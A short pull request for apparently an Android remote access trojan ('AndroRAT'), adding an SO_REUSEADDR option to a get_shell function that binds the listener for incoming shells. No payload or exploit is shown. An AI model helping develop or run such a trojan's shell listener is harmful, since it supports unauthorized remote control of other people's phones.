### PR TITLE
adding reuse socket code

### DIFF
--- a/utils.py
+++ b/utils.py
@@ -299,6 +299,8 @@ def get_shell(ip,port):
     soc = socket.socket() 
     soc = socket.socket(type=socket.SOCK_STREAM)
     try:
+        # Restart the TCP server on exit
+        soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         soc.bind((ip, int(port)))
     except Exception as e:
         print(stdOutput("error")+"\033[1m %s"%e);exit()


### PR DESCRIPTION
I noticed after exiting AndroRAT.py i could not run the script again right after. It would give me the error that the port was still in use, and the only way to start it again was to close the current terminal. With this one line of code it allows you to immediately restart a TCP server. 